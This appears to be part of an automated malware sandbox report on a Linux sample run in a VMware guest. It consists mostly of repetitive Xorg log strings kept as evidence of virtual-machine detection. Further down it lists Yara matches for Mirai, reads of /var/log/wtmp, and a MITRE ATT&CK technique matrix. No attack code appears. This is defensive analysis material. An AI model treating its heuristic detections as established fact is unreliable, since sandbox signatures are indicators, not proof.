    Source: Xorg.0.log.59.drBinary or memory string: [ 457.812] (--) vmware(0): VMware SVGA regs at (0x1070, 0x1071)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.153] (**) vmware(0): Default mode "1152x864": 105.0 MHz, 67.6 kHz, 75.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.358] (**) vmware(0): Default mode "640x480": 25.2 MHz, 31.5 kHz, 59.9 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.442] (II) vmware(0): Not using default mode "896x672" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.446] (**) VirtualPS/2 VMware VMMouse: always reports core events
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.114] (**) vmware(0): Default mode "1024x768": 65.0 MHz, 48.4 kHz, 60.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.600] (==) vmware(0): Depth 24, (==) framebuffer bpp 32
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.180] (II) vmware(0): Not using default mode "1792x1344" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.099] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.085] (**) vmware(0): Default mode "1152x864": 143.5 MHz, 91.5 kHz, 100.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.650] (II) vmware(0): Modeline "1024x768"x85.0 94.50 1024 1072 1168 1376 768 769 772 808 +hsync +vsync (68.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.532] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.957] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.741] (**) vmware(0): Default mode "1152x864": 81.6 MHz, 53.7 kHz, 60.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.505] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.843] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.726] (II) vmware(0): Not using default mode "2048x1536" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.478] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.783] (II) vmware(0): Not using default mode "960x720" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.102] (**) vmware(0): Default mode "1152x864": 119.7 MHz, 77.1 kHz, 85.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.089] (II) vmware(0): Modeline "1152x864"x100.0 143.47 1152 1232 1360 1568 864 865 868 915 -hsync +vsync (91.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.812] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.560] (**) VirtualPS/2 VMware VMMouse: (accel) acceleration threshold: 4
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.002] (II) vmware(0): Not using default mode "2880x1620" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.750] (II) vmware(0): Not using default mode "800x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.388] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.120] (--) vmware(0): vram: 4194304
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.543] (--) vmware(0): depth: 24
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.207] (II) vmware(0): Modeline "640x480"x85.0 36.00 640 696 752 832 480 481 484 509 -hsync -vsync (43.3 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 593.797] (**) vmware(0): Default mode "864x486": 32.5 MHz, 30.3 kHz, 59.9 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.470] (II) vmware(0): Not using default mode "928x696" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.098] (II) vmware(0): Modeline "1152x864"x85.1 121.50 1152 1216 1344 1568 864 865 868 911 +hsync -vsync (77.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.256] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.307] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/event3)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.257] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.095] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.104] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.132] (**) VirtualPS/2 VMware VMMouse: always reports core events
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.241] (**) vmware(0): Default mode "1024x576": 46.5 MHz, 35.9 kHz, 59.9 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.908] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.223] (II) vmware(0): Modeline "800x600"x56.2 36.00 800 824 896 1024 600 601 603 625 +hsync +vsync (35.2 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.715] (II) vmware(0): Not using default mode "360x200" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.856] (II) vmware(0): Modeline "1024x576"x59.9 46.50 1024 1064 1160 1296 576 579 584 599 -hsync +vsync (35.9 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.375] (II) vmware(0): Not using default mode "15360x8640" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.283] (II) vmware(0): Modeline "640x400"x85.1 31.50 640 672 736 832 400 401 404 445 -hsync +vsync (37.9 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.090] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 603.278] (II) Using input driver 'libinput' for 'VirtualPS/2 VMware VMMouse'
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.053] (II) vmware(0): Not using default mode "700x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.259] (**) vmware(0): Default mode "960x540": 40.8 MHz, 33.5 kHz, 59.6 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.145] (II) vmware(0): Not using default mode "684x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.637] (II) vmware(0): Not using default mode "360x202" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.629] (--) vmware(0): bpp: 32
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.132] (--) vmware(0): mheig: 885
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.274] (II) vmware(0): Modeline "720x400"x85.0 35.50 720 756 828 936 400 401 404 446 -hsync +vsync (37.9 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.276] (II) vmware(0): Not using default mode "4096x2304" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.192] (==) vmware(0): RGB weight 888
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.075] (II) vmware(0): Not using default mode "1024x576" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.382] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.471] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.399] (**) vmware(0): Default mode "640x360": 17.8 MHz, 22.2 kHz, 59.3 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.953] (II) vmware(0): Not using default mode "15360x8640" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.261] (**) vmware(0): Default mode "720x405": 22.5 MHz, 25.1 kHz, 59.5 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.754] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.531] (II) vmware(0): Initialized VMWARE_CTRL extension version 0.2
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.641] (--) vmware(0): w.red: 8
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.800] (II) vmware(0): Not using default mode "1280x720" (width requires unsupported line pitch)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.045] (II) config/udev: Adding input device VirtualPS/2 VMware VMMouse (/dev/input/event2)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.362] (II) XINPUT: Adding extended input device "VirtualPS/2 VMware VMMouse" (type: MOUSE, id 9)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.791] (II) vmware(0): Not using default mode "1024x576" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.633] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.567] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.411] (II) vmware(0): Modeline "640x350"x85.1 31.50 640 672 736 832 350 382 385 445 +hsync -vsync (37.9 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.481] (II) event3 - VirtualPS/2 VMware VMMouse: device is a pointer
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.663] (--) vmware(0): w.blu: 8
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.169] (II) vmware(0): Modeline "1152x864"x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync (67.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.346] (II) vmware(0): Not using default mode "1360x768" (width requires unsupported line pitch)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.737] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.112] (--) vmware(0): depth: 24
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.474] (--) vmware(0): vram: 4194304
    Source: Xorg.0.log.103.drBinary or memory string: [ 547.089] (II) vmware(0): Not using default mode "640x512" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.490] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.303] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.517] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.542] (II) vmware(0): Not using default mode "1920x1200" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.588] (II) vmware(0): Modeline "640x360"x59.3 17.75 640 688 720 800 360 363 368 374 +hsync -vsync (22.2 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.328] (II) vmware(0): Not using default mode "700x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.496] (II) vmware(0): Not using default mode "416x312" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.302] (II) event2 - VirtualPS/2 VMware VMMouse: device removed
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.855] (II) vmware(0): Not using default mode "3840x2160" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 558.667] (II) event2 - VirtualPS/2 VMware VMMouse: device removed
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.562] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.212] (**) vmware(0): Default mode "800x600": 36.0 MHz, 35.2 kHz, 56.2 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.941] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 583.174] (II) Loading /usr/lib/xorg/modules/drivers/vmware_drv.so
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.924] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.302] (II) vmware(0): Modeline "640x360"x59.3 17.75 640 688 720 800 360 363 368 374 +hsync -vsync (22.2 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.084] (II) vmware(0): Modeline "864x486"x59.9 32.50 864 888 968 1072 486 489 494 506 -hsync +vsync (30.3 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.706] (II) vmware(0): Not using default mode "320x200" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.967] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.957] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.841] (II) vmware(0): Not using default mode "640x360" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.415] (==) vmware(0): DPI set to (96, 96)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.657] (==) vmware(0): Will set up a driver mode with dimensions 800x600.
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.395] (II) vmware(0): Modeline "640x360"x59.8 18.00 640 664 720 800 360 363 368 376 -hsync +vsync (22.5 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.159] (--) vmware(0): w.red: 8
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.680] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.154] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.760] (==) vmware(0): Using gamma correction (1.0, 1.0, 1.0)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.927] (II) vmware(0): Not using default mode "432x243" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.570] (**) VirtualPS/2 VMware VMMouse: Applying InputClass "libinput pointer catchall"
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.849] (II) vmware(0): Not using default mode "416x312" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.272] (II) vmware(0): Modeline "800x600"x85.1 56.30 800 832 896 1048 600 601 604 631 +hsync +vsync (53.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.972] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.124] (--) vmware(0): pbase: 0xe8000000
    Source: Xorg.0.log.152.drBinary or memory string: [ 603.505] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.154] (**) vmware(0): Default mode "1152x864": 119.7 MHz, 77.1 kHz, 85.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.310] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.039] (II) vmware(0): Not using default mode "576x432" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.858] (II) vmware(0): Not using default mode "1024x768i" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.808] (II) vmware(0): Not using default mode "720x405" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.282] (II) vmware(0): Not using default mode "2048x1152" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.104] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.496] (--) vmware(0): mwidt: 1176
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.471] (II) vmware(0): Not using default mode "840x525" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.708] (II) vmware(0): Not using default mode "1920x1440" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.063] (II) vmware(0): Not using default mode "1280x1024" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.174] (II) vmware(0): Modeline "800x600"x85.1 56.30 800 832 896 1048 600 601 604 631 +hsync +vsync (53.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.654] (**) vmware(0): Default mode "1152x864": 121.5 MHz, 77.5 kHz, 85.1 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.121] (II) vmware(0): Modeline "1152x864"x75.0 108.00 1152 1216 1344 1600 864 865 868 900 +hsync +vsync (67.5 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 590.994] (II) vmware(0): Not using default mode "960x540" (monitor doesn't support reduced blanking)
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.734] (II) event2 - VirtualPS/2 VMware VMMouse: device is a pointer
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.445] (II) vmware(0): Not using default mode "1600x1024" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.166] (II) vmware(0): Not using default mode "1600x900" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.220] (II) vmware(0): Clock range: 0.00 to 400000.00 MHz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.437] (II) vmware(0): Not using default mode "1792x1344" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.432] (II) vmware(0): Not using default mode "800x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.301] (II) vmware(0): Not using default mode "5120x2880" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.662] (II) vmware(0): Modeline "1152x864"x85.1 121.50 1152 1216 1344 1568 864 865 868 911 +hsync -vsync (77.5 kHz d)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.438] (II) vmware(0): Not using default mode "720x450" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 605.199] (II) vmware(0): Terminating Xv video-stream id:0
    Source: Xorg.0.log.59.drBinary or memory string: [ 469.589] (II) vmware(0): Terminating Xv video-stream id:0
    Source: Xorg.0.log.103.drBinary or memory string: [ 558.621] (II) event3 - VirtualPS/2 VMware VMMouse: device removed
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.817] (II) vmware(0): Not using default mode "320x240" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 460.985] (II) vmware(0): Not using default mode "7680x4320" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.216] (==) vmware(0): Using gamma correction (1.0, 1.0, 1.0)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.703] (**) vmware(0): Default mode "1152x864": 105.0 MHz, 67.6 kHz, 75.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.882] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.846] (**) vmware(0): Default mode "1024x576": 46.5 MHz, 35.9 kHz, 59.9 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 594.515] (**) vmware(0): Default mode "640x360": 18.0 MHz, 22.5 kHz, 59.8 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 467.794] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.404] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.725] (II) vmware(0): Not using default mode "1024x768" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.471] (II) vmware(0): Not using default mode "1400x900" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 597.240] (II) vmware(0): Initialized VMware Xv extension successfully.
    Source: Xorg.0.log.103.drBinary or memory string: [ 556.370] (II) event3 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.152.drBinary or memory string: [ 589.181] (II) vmware(0): Not using default mode "1600x1200" (insufficient memory for mode)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.289] (II) vmware(0): Modeline "800x600"x72.2 50.00 800 856 976 1040 600 637 643 666 +hsync +vsync (48.1 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 591.084] (II) vmware(0): Not using default mode "512x288" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.854] (==) vmware(0): Silken mouse enabled
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.038] (II) vmware(0): Not using default mode "1400x900" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.479] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.386] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.239] (**) vmware(0): Default mode "640x480": 31.5 MHz, 37.5 kHz, 75.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.088] (II) vmware(0): Not using default mode "960x600" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 542.752] (II) LoadModule: "vmware"
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.133] (II) vmware(0): Modeline "1024x768"x60.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync (48.4 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.571] (II) vmware(0): Not using default mode "1400x1050" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.670] (**) vmware(0): Default mode "1152x864": 119.7 MHz, 77.1 kHz, 85.0 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.860] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.684] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.973] (II) vmware(0): Not using default mode "512x384" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.684] (II) vmware(0): Not using default mode "1920x1080" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.845] (II) vmware(0): Not using default mode "3200x1800" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 604.427] (II) event2 - VirtualPS/2 VMware VMMouse: is tagged by udev as: Mouse
    Source: Xorg.0.log.103.drBinary or memory string: [ 550.201] (**) vmware(0): Default mode "800x600": 40.0 MHz, 37.9 kHz, 60.3 Hz
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.804] (II) vmware(0): Not using default mode "2560x1440" (insufficient memory for mode)
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.922] (II) vmware(0): Modeline "800x600"x75.0 49.50 800 816 896 1056 600 601 604 625 +hsync +vsync (46.9 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.199] (**) vmware(0): Default mode "1024x768": 94.5 MHz, 68.7 kHz, 85.0 Hz
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.245] (II) vmware(0): Modeline "1024x576"x59.9 46.50 1024 1064 1160 1296 576 579 584 599 -hsync +vsync (35.9 kHz d)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.391] (**) vmware(0): Default mode "640x360": 18.0 MHz, 22.5 kHz, 59.8 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 592.753] (II) vmware(0): Modeline "1152x864"x60.0 81.62 1152 1216 1336 1520 864 865 868 895 -hsync +vsync (53.7 kHz d)
    Source: Xorg.0.log.152.drBinary or memory string: [ 597.138] (==) vmware(0): Backing store enabled
    Source: Xorg.0.log.59.drBinary or memory string: [ 459.664] (II) vmware(0): Not using default mode "1680x1050" (insufficient memory for mode)
    Source: Xorg.0.log.103.drBinary or memory string: [ 549.060] (II) vmware(0): Not using default mode "1280x800" (width requires unsupported line pitch)
    Source: Xorg.0.log.103.drBinary or memory string: [ 546.806] (II) vmware(0): Not using default mode "400x300" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.103.drBinary or memory string: [ 548.680] (II) vmware(0): Not using default mode "480x270" (bad mode clock/interlace/doublescan)
    Source: Xorg.0.log.59.drBinary or memory string: [ 461.366] (**) vmware(0): Default mode "720x405": 22.5 MHz, 25.1 kHz, 59.5 Hz
    Source: Xorg.0.log.152.drBinary or memory string: [ 588.704] (==) vmware(0): RGB weight 888

    Language, Device and Operating System Detection:

    barindex
    Reads system files that contain records of logged in users
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 5709)Logged in records file read: /var/log/wtmpJump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6242)Logged in records file read: /var/log/wtmpJump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 6700)Logged in records file read: /var/log/wtmpJump to behavior
    Source: /usr/lib/accountsservice/accounts-daemon (PID: 7118)Logged in records file read: /var/log/wtmp

    Stealing of Sensitive Information:

    barindex
    Yara detected Mirai
    Source: Yara matchFile source: 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORY
    Source: Yara matchFile source: 5246.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORY

    Remote Access Functionality:

    barindex
    Yara detected Mirai
    Source: Yara matchFile source: 5244.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORY
    Source: Yara matchFile source: 5246.1.000000001a887bdc.00000000934a2024.r-x.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Systemd Service1Systemd Service1File and Directory Permissions Modification1OS Credential Dumping1Security Software Discovery11Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsScripting1LSASS MemorySystem Owner/User Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Hidden Files and Directories1Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSSystem Information Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol3SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptIndicator Removal on Host1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsApplication Layer Protocol4Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Malware Configuration

    No configs have been found

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Number of created Files
    • Is malicious
    • Internet
